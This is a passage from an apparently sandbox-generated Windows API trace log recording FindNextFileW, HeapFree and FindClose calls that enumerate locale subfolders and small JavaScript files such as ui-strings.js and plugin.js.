lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="themes", cAlternateFileName="")) returned 0 [0176.768] FindClose (in: hFindFile=0x727608 | out: hFindFile=0x727608) returned 1 [0176.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0176.768] FindNextFileW (in: hFindFile=0x7276c8, lpFindFileData=0x3b3e420 | out: lpFindFileData=0x3b3e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0176.816] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.816] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ca-es", cAlternateFileName="")) returned 1 [0176.829] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.829] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-cz", cAlternateFileName="")) returned 1 [0176.830] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.830] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-dk", cAlternateFileName="")) returned 1 [0176.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.831] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-de", cAlternateFileName="")) returned 1 [0176.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.832] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-ae", cAlternateFileName="")) returned 1 [0176.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.833] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-gb", cAlternateFileName="")) returned 1 [0176.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.834] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-il", cAlternateFileName="")) returned 1 [0176.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.834] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0176.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.835] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eu-es", cAlternateFileName="")) returned 1 [0176.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.836] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-fi", cAlternateFileName="")) returned 1 [0176.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.836] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0176.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.837] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-ma", cAlternateFileName="")) returned 1 [0176.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.837] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="he-il", cAlternateFileName="")) returned 1 [0176.837] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.837] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-hr", cAlternateFileName="")) returned 1 [0176.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.838] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-hu", cAlternateFileName="")) returned 1 [0176.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.840] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-it", cAlternateFileName="")) returned 1 [0176.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.840] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-jp", cAlternateFileName="")) returned 1 [0176.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.841] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-kr", cAlternateFileName="")) returned 1 [0176.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-no", cAlternateFileName="")) returned 1 [0176.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-nl", cAlternateFileName="")) returned 1 [0176.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.842] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-pl", cAlternateFileName="")) returned 1 [0176.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.843] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-br", cAlternateFileName="")) returned 1 [0176.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.844] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-ro", cAlternateFileName="")) returned 1 [0176.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.845] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0176.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.845] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-ru", cAlternateFileName="")) returned 1 [0176.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.845] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-sk", cAlternateFileName="")) returned 1 [0176.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.846] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-si", cAlternateFileName="")) returned 1 [0176.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.847] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-sl", cAlternateFileName="")) returned 1 [0176.847] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.847] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-se", cAlternateFileName="")) returned 1 [0176.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.848] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-tr", cAlternateFileName="")) returned 1 [0176.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.848] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x451, dwReserved0=0x0, dwReserved1=0x0, cFileName="ui-strings.js", cAlternateFileName="UI-STR~1.JS")) returned 1 [0176.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.849] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0176.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.849] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0176.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.850] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec8f4df, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeec8f4df, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeec8f4df, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-tw", cAlternateFileName="")) returned 0 [0176.850] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0176.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.850] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x3bd, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="plugin.js", cAlternateFileName="")) returned 1 [0176.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0176.854] FindNextFileW (in: hFindFile=0x727c08, lpFindFileData=0x3b3df28 | out: lpFindFileData=0x3b3df28*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rhp", cAlternateFileName="")) returned 0 [0176.854] FindClose (in: hFindFile=0x727c08 | out: hFindFile=0x727c08) returned 1 [0176.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0176.854] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3e1a4 | out: lpFindFileData=0x3b3e1a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeecb15b3, ftCreationTime.dwHighDateTime=0x1d39f5d, ftLastAccessTime.dwLowDateTime=0xeecb15b3, ftLastAccessTime.dwHighDateTime=0x1d39f5d, ftLastWriteTime.dwLowDateTime=0xeecb15b3, ftLastWriteTime.dwHighDateTime=0x1d39f5d, 